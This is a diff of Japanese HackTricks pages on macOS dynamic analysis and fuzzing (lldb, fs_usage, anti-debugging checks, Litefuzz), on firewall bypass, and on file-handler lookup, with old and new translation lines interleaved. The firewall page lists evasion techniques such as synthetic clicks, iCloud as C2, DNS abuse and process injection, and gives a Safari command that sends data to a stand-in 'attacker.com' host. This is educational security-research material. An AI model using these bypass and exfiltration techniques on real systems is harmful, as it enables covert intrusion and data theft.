[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) は、Microsoft Sysinternalの _Procmon_ からおなじみの外観と操作感を持つGUIツールです。すべての種類のイベントの記録の開始と停止を行い、カテゴリーファイル、プロセス、ネットワークなどによってフィルタリングし、記録されたイベントをjsonファイルとして保存できます。
[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo)は、Microsoft Sysinternalの _Procmon_ からWindowsユーザーが知っている外観と感覚を持つGUIツールです。このツールを使用すると、さまざまなイベントタイプの記録を開始および停止でき、これらのイベントをファイル、プロセス、ネットワークなどのカテゴリでフィルタリングでき、記録されたイベントをjson形式で保存できます。
### Apple Instruments
[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) はXcodeの開発ツールの一部であり、アプリケーションのパフォーマンスを監視し、メモリリークを特定し、ファイルシステムのアクティビティを追跡するために使用されます。
[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html)はXcodeの開発ツールの一部であり、アプリケーションのパフォーマンスを監視し、メモリリークを特定し、ファイルシステムのアクティビティを追跡するために使用されます。
![](<../../../.gitbook/assets/image (15).png>)
### fs\_usage
プロセスによって実行されるアクションを追跡することができます
プロセスによって実行されるアクションを追跡することができます
```bash
fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names containing ls
fs_usage -w -f network curl #This tracks network actions
```
### TaskExplorer
[**TaskExplorer**](https://objective-see.com/products/taskexplorer.html)は、バイナリによって使用されている**ライブラリ**、使用中の**ファイル**、および**ネットワーク**接続を確認するのに便利です。\
また、バイナリプロセスを**virustotal**と照合し、バイナリに関する情報を表示します。
[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html)は、バイナリが使用している**ライブラリ**、使用している**ファイル**、および**ネットワーク**接続を確認するのに便利です。\
また、バイナリプロセスを**virustotal**に対してチェックし、バイナリに関する情報を表示します。
## PT\_DENY\_ATTACH <a href="#page-title" id="page-title"></a>
[**このブログ投稿**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html)では、**`PT_DENY_ATTACH`** を使用してSIPが無効になっていてもデバッグを防止する**実行中のデーモン**を**デバッグ**する方法の例が紹介されています。
[**このブログ投稿**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html)では、SIPが無効になっていても**`PT_DENY_ATTACH`**を使用してデバッグを防止する実行中のデーモンのデバッグ方法の例が示されています。
### lldb
@ -340,20 +339,18 @@ lldb -p 1122
lldb -n malware.bin
lldb -n malware.bin --waitfor
```
```
lldbを使用する際には、ホームフォルダに**`.lldbinit`**というファイルを作成し、以下の行を設定することでintelフレーバーを設定できます:
```
次の行を含むファイル**`.lldbinit`**をホームフォルダに作成することで、lldbを使用する際にintelフレーバーを設定できます。
```bash
settings set target.x86-disassembly-flavor intel
```
{% hint style="warning" %}
lldb内で、`process save-core`を使てプロセスをダンプします。
lldb内で、`process save-core`を使用してプロセスをダンプします。
{% endhint %}
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) コマンド</strong></td><td><strong>説明</strong></td></tr><tr><td><strong>run (r)</strong></td><td>実行を開始し、ブレークポイントに達するかプロセスが終了するまで続けます。</td></tr><tr><td><strong>continue (c)</strong></td><td>デバッグされているプロセスの実行を続けます。</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>次の命令を実行します。このコマンドは関数呼び出しをスキップします。</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>次の命令を実行します。nextiコマンドとは異なり、このコマンドは関数呼び出しにステップインします。</td></tr><tr><td><strong>finish (f)</strong></td><td>現在の関数("フレーム")内の残りの命令を実行し、停止します。</td></tr><tr><td><strong>control + c</strong></td><td>実行を一時停止します。プロセスがrun (r)またはcontinue (c)されている場合、現在実行中の場所でプロセスを停止させます。</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p>b main #mainと呼ばれる任意の関数</p><p>b &#x3C;binname>`main #バイナリのmain関数</p><p>b set -n main --shlib &#x3C;lib_name> #指定されたバイナリのmain関数</p><p>b -[NSDictionary objectForKey:]</p><p>b -a 0x0000000100004bd9</p><p>br l #ブレークポイントリスト</p><p>br e/dis &#x3C;num> #ブレークポイントの有効/無効化</p><p>breakpoint delete &#x3C;num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint #ブレークポイントコマンドのヘルプを表示</p><p>help memory write #メモリへの書き込み方法についてのヘルプを表示</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format &#x3C;<a href="https://lldb.llvm.org/use/variable.html#type-format">format</a>></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s &#x3C;reg/memory address></strong></td><td>メモリをヌル終端文字列として表示します。</td></tr><tr><td><strong>x/i &#x3C;reg/memory address></strong></td><td>メモリをアセンブリ命令として表示します。</td></tr><tr><td><strong>x/b &#x3C;reg/memory address></strong></td><td>メモリをバイトとして表示します。</td></tr><tr><td><strong>print object (po)</strong></td><td><p>パラメータによって参照されるオブジェクトを表示します。</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>AppleのObjective-C APIやメソッドのほとんどはオブジェクトを返すため、"print object" (po) コマンドで表示する必要があります。poが意味のある出力をしない場合は<code>x/b</code>を使用します。</p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 #そのアドレスにAAAAを書き込む<br>memory write -f s $rip+0x11f+7 "AAAA" #アドレスにAAAAを書き込む</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis #現在の関数を逆アセンブル</p><p>dis -n &#x3C;funcname> #関数を逆アセンブル</p><p>dis -n &#x3C;funcname> -b &#x3C;basename> #関数を逆アセンブル<br>dis -c 6 #6行を逆アセンブル<br>dis -c 0x100003764 -e 0x100003768 # 一つのアドレスから別のアドレスまで<br>dis -p -c 4 #現在のアドレスから逆アセンブルを開始</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # x1レジスタの3コンポーネントの配列をチェック</td></tr></tbody></table>
<table data-header-hidden><thead><tr><th width="225"></th><th></th></tr></thead><tbody><tr><td><strong>(lldb) コマンド</strong></td><td><strong>説明</strong></td></tr><tr><td><strong>run (r)</strong></td><td>ブレークポイントがヒットするかプロセスが終了するまで続行される実行を開始します。</td></tr><tr><td><strong>continue (c)</strong></td><td>デバッグ対象プロセスの実行を継続します。</td></tr><tr><td><strong>nexti (n / ni)</strong></td><td>次の命令を実行します。このコマンドは関数呼び出しをスキップします。</td></tr><tr><td><strong>stepi (s / si)</strong></td><td>次の命令を実行します。nextiコマンドとは異なり、このコマンドは関数呼び出しに入ります。</td></tr><tr><td><strong>finish (f)</strong></td><td>現在の関数("frame")内の残りの命令を実行して停止します。</td></tr><tr><td><strong>control + c</strong></td><td>実行を一時停止します。プロセスが実行されている場合、現在実行中の場所でプロセスを停止させます。</td></tr><tr><td><strong>breakpoint (b)</strong></td><td><p>b main # main関数を呼び出す</p><p>b <binname>`main # バイナリのmain関数</p><p>b set -n main --shlib <lib_name> # 指定されたバイナリのmain関数</p><p>b -[NSDictionary objectForKey:]</p><p>b -a 0x0000000100004bd9</p><p>br l # ブレークポイントリスト</p><p>br e/dis <num> # ブレークポイントを有効化/無効化</p><p>breakpoint delete <num></p></td></tr><tr><td><strong>help</strong></td><td><p>help breakpoint # ブレークポイントコマンドのヘルプを取得</p><p>help memory write # メモリへの書き込みに関するヘルプを取得</p></td></tr><tr><td><strong>reg</strong></td><td><p>reg read</p><p>reg read $rax</p><p>reg read $rax --format <a href="https://lldb.llvm.org/use/variable.html#type-format">format</a></p><p>reg write $rip 0x100035cc0</p></td></tr><tr><td><strong>x/s <reg/memory address></strong></td><td>メモリをヌル終端文字列として表示します。</td></tr><tr><td><strong>x/i <reg/memory address></strong></td><td>メモリをアセンブリ命令として表示します。</td></tr><tr><td><strong>x/b <reg/memory address></strong></td><td>メモリをバイトとして表示します。</td></tr><tr><td><strong>print object (po)</strong></td><td><p>これは、パラメータで参照されるオブジェクトを出力します</p><p>po $raw</p><p><code>{</code></p><p><code>dnsChanger = {</code></p><p><code>"affiliate" = "";</code></p><p><code>"blacklist_dns" = ();</code></p><p>AppleのほとんどのObjective-C APIやメソッドはオブジェクトを返すため、「print object」poコマンドを使用して表示する必要があります。 poが有意義な出力を生成しない場合は、<code>x/b</code>を使用してください</p></td></tr><tr><td><strong>memory</strong></td><td>memory read 0x000....<br>memory read $x0+0xf2a<br>memory write 0x100600000 -s 4 0x41414141 # そのアドレスにAAAAを書き込む<br>memory write -f s $rip+0x11f+7 "AAAA" # アドレスにAAAAを書き込む</td></tr><tr><td><strong>disassembly</strong></td><td><p>dis # 現在の関数を逆アセンブル</p><p>dis -n <funcname> # 関数を逆アセンブル</p><p>dis -n <funcname> -b <basename> # 関数を逆アセンブル<br>dis -c 6 # 6行を逆アセンブル<br>dis -c 0x100003764 -e 0x100003768 # 1つのアドレスからもう1つのアドレスまで<br>dis -p -c 4 # 現在のアドレスから逆アセンブルを開始</p></td></tr><tr><td><strong>parray</strong></td><td>parray 3 (char **)$x1 # x1レジスタの3つのコンポーネントの配列をチェック</td></tr></tbody></table>
{% hint style="info" %}
**`objc_sendMsg`** 関数を呼び出す際、**rsi** レジスタはメソッドの**名前**をヌル終端の("C")文字列として保持します。lldbで名前を表示するには
**`objc_sendMsg`** 関数を呼び出す際、**rsi** レジスタにはヌル終端("C")文字列としての**メソッド名**が格納されます。lldbを使用して名前を表示するには以下のようにします
`(lldb) x/s $rsi: 0x1000f1576: "startMiningWithPort:password:coreCount:slowMemory:currency:"`
@ -363,29 +360,29 @@ lldb内で、`process save-core`を使ってプロセスをダンプします。
`(lldb) reg read $rsi: rsi = 0x00000001000f1576 "startMiningWithPort:password:coreCount:slowMemory:currency:"`
{% endhint %}
### アンチダイナミック解析
### 動的解析対策
#### VM検出
* コマンド **`sysctl hw.model`** は、**ホストがMacOSの場合**は"Mac"を返し、VMの場合は異なる値を返します。
* **`hw.logicalcpu`** と **`hw.physicalcpu`** の値を操作することで、一部のマルウェアはVMであるかを検出しようとします。
* 一部のマルウェアは、MACアドレス00:50:56に基づいて、マシンが**VMware**であるかを**検出**することもできます。
* 以下のような単純なコードで、**プロセスがデバッグされているかどうか**を見つけることも可能です:
* `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //プロセスがデバッグされている }`
* **`ptrace`** システムコールを **`PT_DENY_ATTACH`** フラグと共に呼び出すこともできます。これにより、デバッガーがアタッチしてトレースするのを**防ぎます**
* **`sysctl`** または **`ptrace`** 関数が**インポートされているか**を確認できます(ただし、マルウェアは動的にインポートすることもあります)
* この記事で指摘されているように、"[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\
“_メッセージ Process # exited with **status = 45 (0x0000002d)**通常、デバッグ対象が **PT\_DENY\_ATTACH** を使用していることを示す兆候です_
* **`sysctl hw.model`** コマンドは、**ホストがMacOS**の場合は "Mac" を返しますが、VMの場合は異なる値を返します。
* 一部のマルウェアは、**`hw.logicalcpu`** および **`hw.physicalcpu`** の値を操作して、VMであるかどうかを検出しようとします。
* 一部のマルウェアは、MACアドレス00:50:56に基づいて **VMware** であるかどうかを検出することもあります。
* 単純なコードを使用して、プロセスがデバッグされているかどうかを検出することも可能です:
* `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //process being debugged }`
* **`ptrace`** システムコールを **`PT_DENY_ATTACH`** フラグで呼び出すこともできます。これにより、デバッガがアタッチおよびトレースを防止します
* **`sysctl`** または **`ptrace`** 関数が **インポート** されているかどうかを確認できます(ただし、マルウェアは動的にインポートする可能性があります)
* この記事に記載されているように、"[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)"\
"_メッセージ「Process # exited with **status = 45 (0x0000002d)**」は、通常、デバッグ対象が **PT\_DENY\_ATTACH** を使用していることを示す兆候です_"
## ファジング
### [ReportCrash](https://ss64.com/osx/reportcrash.html)
ReportCrashは**クラッシュしたプロセスを分析し、クラッシュレポートをディスクに保存**します。クラッシュレポートには、クラッシュの原因を**診断するのに役立つ情報**が含まれています。\
ユーザーごとのlaunchdコンテキストで**実行されているアプリケーションやその他のプロセス**の場合、ReportCrashはLaunchAgentとして実行され、クラッシュレポートをユーザーの`~/Library/Logs/DiagnosticReports/`に保存します。\
デーモンやシステムlaunchdコンテキストで**実行されているその他のプロセス**、その他の特権プロセスの場合、ReportCrashはLaunchDaemonとして実行され、クラッシュレポートをシステムの`/Library/Logs/DiagnosticReports`に保存します。
ReportCrashは**クラッシュしたプロセスを分析し、クラッシュレポートをディスクに保存**します。クラッシュレポートには、クラッシュの原因を診断するのに役立つ情報が含まれています。\
ユーザーごとのlaunchdコンテキストで実行されるアプリケーションや他のプロセスの場合、ReportCrashはLaunchAgentとして実行され、クラッシュレポートをユーザーの `~/Library/Logs/DiagnosticReports/` に保存します。\
デーモン、システムlaunchdコンテキストで実行される他のプロセスや他の特権を持つプロセスの場合、ReportCrashはLaunchDaemonとして実行され、クラッシュレポートをシステムの `/Library/Logs/DiagnosticReports` に保存します。
クラッシュレポートが**Appleに送信されること**を心配している場合は、それらを無効にすることができます。そうでなければ、クラッシュレポートは**サーバーがクラッシュした原因を解明する**のに役立つことがあります。
クラッシュレポートが **Appleに送信されるのを心配**している場合は、それらを無効にできます。そうでない場合、クラッシュレポートはサーバーがどのようにクラッシュしたかを把握するのに役立ちます。
```bash
#To disable crash reporting:
launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
@ -397,15 +394,15 @@ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.
```
### スリープ
MacOSでファジングを行う際には、Macがスリープ状態にならないようにすることが重要です:
MacOSでのファジング中は、Macがスリープモードに入らないようにすることが重要です:
* systemsetup -setsleep Never
* pmset、システム環境設定
* [KeepingYouAwake](https://github.com/newmarcel/KeepingYouAwake)
#### SSH切断
#### SSH切断
SSH接続を介してファジングを行う場合、セッションが切断されないようにすることが重要です。そのためにはsshd\_configファイルを変更します
SSH接続を介してファジングを行っている場合は、セッションが切断されないようにすることが重要です。そのために、sshd_configファイルを以下のように変更してください
* TCPKeepAlive Yes
* ClientAliveInterval 0
@ -414,9 +411,9 @@ SSH接続を介してファジングを行う場合、セッションが切断
sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist
sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
```
### 内部ハンドラ
### 内部ハンドラ
**以下のページをチェックして**、指定されたスキームまたはプロトコルを処理しているアプリがどれかを見つける方法を確認してください:
**以下のページ**をチェックして、指定されたスキームやプロトコルを処理するアプリを特定する方法を見つけてください:
{% content-ref url="../macos-file-extension-apps.md" %}
[macos-file-extension-apps.md](../macos-file-extension-apps.md)
@ -424,14 +421,14 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
### ネットワークプロセスの列挙
これは、ネットワークデータを管理しているプロセスを見つけるの興味深いです:
ネットワークデータを管理しているプロセスを見つけるの興味深いです:
```bash
dtrace -n 'syscall::recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' >> recv.log
#wait some time
sort -u recv.log > procs.txt
cat procs.txt
```
または `netstat``lsof` を使用する
または`netstat`または`lsof`を使用します
### Libgmalloc
@ -441,7 +438,9 @@ cat procs.txt
```bash
lldb -o "target create `which some-binary`" -o "settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib" -o "run arg1 arg2" -o "bt" -o "reg read" -o "dis -s \$pc-32 -c 24 -m -F intel" -o "quit"
```
### ファジャー
{% endcode %}
### ファジングツール
#### [AFL++](https://github.com/AFLplusplus/AFLplusplus)
@ -449,9 +448,9 @@ CLIツールに対応しています。
#### [Litefuzz](https://github.com/sec-tools/litefuzz)
macOSのGUIツールで**「そのまま動作する」**ことが特徴です。ただし、一部のmacOSアプリにはユニークなファイル名が必要だったり、正しい拡張子が必要だったり、サンドボックスからファイルを読み込む必要がある`~/Library/Containers/com.apple.Safari/Data`)など、特定の要件があることに注意してください。
macOSのGUIツールと "**just works"** します。一部のmacOSアプリには、ユニークなファイル名、適切な拡張子、サンドボックスからファイルを読み取る必要があるなど、特定の要件があります (`~/Library/Containers/com.apple.Safari/Data`)...
いくつかの例
いくつかの例:
{% code overflow="wrap" %}
```bash
@ -477,10 +476,9 @@ litefuzz -lk -c "smbutil view smb://localhost:4455" -a tcp://localhost:4455 -i i
# screensharingd (using pcap capture)
litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash screensharingd -p -n 100000
```
```markdown
{% endcode %}
### MacOSに関するさらなるFuzzing情報
### 追加のFuzzing MacOS情報
* [https://www.youtube.com/watch?v=T5xfL9tEg44](https://www.youtube.com/watch?v=T5xfL9tEg44)
* [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf)
@ -489,21 +487,21 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
## 参考文献
* [**OS X インシデント対応:スクリプティングと分析**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)
* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)
* [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
* [**The Art of Mac Malware: The Guide to Analyzing Malicious Software**](https://taomm.org/)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする**
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>
```

60
macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
View file

@ -2,57 +2,57 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
## 見つかった技術
## 発見されたテクニック
以下の技術は、いくつかのmacOSファイアウォールアプリで機能していることが確認されています
以下のテクニックは、一部の macOS ファイアウォールアプリで機能することが確認されました
### ホワイトリスト名の悪用
* 例えば、**`launchd`** のようなmacOSのよく知られたプロセスの名前でマルウェアを呼び出す
* たとえば、マルウェアを **`launchd`** のようなよく知られた macOS プロセスの名前で呼び出す
### シンセティッククリック
* ファイアウォールがユーザーに許可を求める場合、マルウェアで**許可をクリックする**
* ファイアウォールがユーザーに許可を求める場合、マルウェア**許可をクリック** させる
### **Apple署名済みバイナリの使用**
### **Apple 署名のバイナリの使用**
* **`curl`** のようなものですが、**`whois`** のような他のものもあります
* **`curl`** のようなものだけでなく、**`whois`** なども
### よく知られたappleドメイン
### よく知られた Apple ドメイン
ファイアウォールは、**`apple.com`** や **`icloud.com`** のようなよく知られたappleドメインへの接続を許可している可能性があります。そしてiCloudはC2として使用できます
ファイアウォールは、**`apple.com`** や **`icloud.com`** のようなよく知られた Apple ドメインへの接続を許可しているかもしれません。そして iCloud は C2 として使用されるかもしれません
### 一般的なバイパス
ファイアウォールをバイパスするためのいくつかのアイデア
ファイアウォールをバイパスしようとするいくつかのアイデア
### 許可されたトラフィックの確認
### 許可されたトラフィックを確認する
許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されているドメインやそれにアクセスできるアプリケーションを特定するのに役立ちます。
許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されているドメインやそれにアクセスできるアプリケーションを特定できます
```bash
lsof -i TCP -sTCP:ESTABLISHED
```
### DNSの悪用
DNS解決は、おそらくDNSサーバーに接触することが許可される署名されたアプリケーション**`mdnsreponder`**を介して行われます。
DNSの解決は、おそらくDNSサーバーに連絡を取ることが許可されるであろう**`mdnsreponder`**署名アプリケーションを介して行われます。
<figure><img src="../../.gitbook/assets/image (1) (1) (6).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (6).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>
### ブラウザアプリ経由
### ブラウザアプリを介して
* **osascript**
* **oascript**
```applescript
tell application "Safari"
run
@ -79,7 +79,7 @@ open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
```
### プロセスインジェクションを介して
任意のサーバーに接続が許可されているプロセスに**コードをインジェクト**できれば、ファイアウォールの保護をバイパスできる可能性があります:
**プロセスにコードをインジェクト**できれば、任意のサーバーに接続を許可されているプロセスにコードをインジェクトすることでファイアウォールの保護をバイパスできます:
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
@ -91,14 +91,14 @@ open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)で<strong>AWSハッキングをゼロからヒーローになる方法を学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加する、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>

38
macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
View file

@ -1,23 +1,23 @@
# macOS ファイル拡張子 & URL スキーム アプリハンドラ
# macOSファイル拡張子URLスキームアプリハンドラ
<details>
<summary><strong>AWS ハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または **HackTricksをPDFでダウンロードしたい** 場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や [**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有**してください。
- **HackTricksで企業を宣伝したい**か、**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>
ファイル拡張子 & URL スキーム アプリハンドラ
## ファイル拡張子URLスキームアプリハンドラ
以下の行は、拡張子に応じてファイルを開くことができるアプリケーションを見つけるのに役立つかもしれません
```
の行は、拡張子に応じてファイルを開くことができるアプリケーションを見つけるのに役立ちます
```bash
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E "path:|bindings:|name:"
```
または、[**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps)のようなものを使用します:
